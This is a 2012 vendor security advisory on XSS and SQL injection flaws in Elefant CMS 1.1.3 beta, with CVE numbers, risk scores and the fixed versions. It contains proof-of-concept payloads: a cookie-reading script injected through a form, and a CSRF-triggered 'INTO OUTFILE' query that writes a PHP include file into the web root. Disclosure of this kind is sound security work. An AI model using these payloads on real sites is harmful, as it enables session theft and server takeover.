Total Tests:

Multiple vulnerabilities in Elefant CMS

Advisory ID:HTB23076
Product:Elefant CMS
Vendor:Elefant CMS
Vulnerable Versions:1.1.3 beta and probably prior
Tested Version:1.1.3 beta
Advisory Publication:February 22, 2012 [without technical details]
Vendor Notification:February 22, 2012
Vendor Fix:February 22, 2012
Public Disclosure:March 14, 2012
Latest Update:February 23, 2012
Vulnerability Type:SQL Injection [CWE-89]
Cross-Site Scripting [CWE-79]
CVE References:CVE-2012-1295
CVE-2012-1296
Risk Level:Medium
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Elefant CMS, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.

1) Cross-Site Scripting (XSS) in Elefant CMS: CVE-2012-1296
1.1 Input passed via the "title" and "body" GET parameters to /admin/preview is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrate the vulnerability:
<form action="http://[host]/admin/preview" method="post">
<input type="hidden" name="title" value="<script>alert(document.cookie);</script>">
<input type="hidden" name="body" value="<script>alert(document.cookie);</script>">
<input type="submit" value="submit" id="btn">
</form>

2) SQL Injection in Elefant CMS: CVE-2012-1295
2.1 Input passed via the "offset" GET parameter to /admin/pages, /admin/versions, /user/admin, /blocks/admin, /blog/admin is not properly sanitised before being used in SQL query.
This can be exploited to alter SQL queries.
The vulnerability usage is limited to the "INTO FILE" clause. This vulnerability requires administrative privileges, however can be exploited via the CSRF technique. Remote attacker should make logged-in website administrator open the following URL:
http://[host]/user/admin?offset=2 INTO OUTFILE '../../../../path/to/site/files/file.php'
Prior to this, the attacker should create a new user account with "<? include($url); ?>" (or any other) name. Then the attacker should also calculate the "offset" parameter in the URL above in such a manner that the newly created user would be displayed in the users list.
Depending on MySQL and PHP configurations, as well as file system permissions this PoC should create arbitrary PHP file within the web root.

How to Detect SQL Injection Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to 1.0.2-Stable or 1.1.5-Beta.

More information:
http://www.elefantcms.com/forum/discussion/39/elefant-1.0.2-and-1.1.5-security-updates-released


References:
[1] High-Tech Bridge Advisory HTB23076 - https://www.immuniweb.com/advisory/HTB23076 - Multiple vulnerabilities in Elefant CMS.
[2] Elefant CMS - http://www.elefantcms.com - Elefant is a web framework and content management system written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential